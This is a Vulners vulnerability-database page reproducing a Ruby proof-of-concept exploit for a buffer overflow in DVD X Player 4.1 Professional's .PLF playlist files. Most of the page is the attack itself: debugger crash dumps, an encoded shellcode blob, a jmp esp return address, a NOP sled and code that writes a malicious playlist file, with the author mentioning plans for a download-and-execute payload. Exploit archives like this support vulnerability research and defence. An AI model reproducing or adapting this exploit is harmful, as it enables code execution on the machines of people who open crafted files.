Vulners
Lucene search
DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
===============================================================
DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
===============================================================
#!/usr/bin/env ruby
####################################################################################################
#0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b.
#First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside
#A .plf file Which is InterVideo WinDVD Play list File but also Dvd x uses this file as a play
#list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful
#Exploitation calc will open and if it don't make sure you have the right jmp esp%
#Tested on :win xp service pack 2
#Vendors web site: http://www.dvd-x-player.com/
#Esp was pointing 277 byte's in to the buffer.
#And eip was over written 261 byte's in to the buffer .So i made the 17 byte's up with nop's sled.
#I will be writing a c version as it will be nice to have download execute shell code as the program
#Doesn't shut down but runs in the back ground
####################################################################################################
# \\Debug info//
#(65c.98c): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000001 ebx=77f6cf47 ecx=04450e60 edx=00000042 esi=04450348 edi=6405341c
#eip=41414141 esp=0012f4ac ebp=01adfe50 iopl=0 nv up ei pl nz na po nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
#41414141 ?? ???
#0:000> g
#(65c.98c): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
#eip=41414141 esp=0012f0dc ebp=0012f0fc iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#41414141 ?? ???
###################################################################################
#Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex ~ Kevin Finisterre
###################################################################################
#Credit goes to n00b for writing exploit and finding bug. !!! < Enjoy >.
###################################################################################
Header1 = "\x63\x3A\x5c" # C:\
bof = 'A'* 257 #Fill our bufer with sh!t.
shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ #351 bytes
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"+
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"+
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"+
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"+
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"+
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"+
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"+
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"+
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"+
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"+
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"+
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a"
ret = "\x27\xB1\xFA\x77" # 4bytes // Jmp esp% in shlwapi.dll
nop = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" # Ffs my nop sled 16byte's
bof2 ='B'* 388 # fill the rest of the file up with sh!t.
Header2 = "\x2E\x6D\x70\x33" # .mp3
n00b = Header1 + bof + ret + nop + shell + bof2 + Header2 # Build the file.
File.open( "Exploit.plf","w") do |the_file| # Open the file for writing
the_file.puts (n00b) # Place data from variable.
the_file.close # Close
end
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2007 00:00Current
6.8Medium risk
Vulners AI Score6.8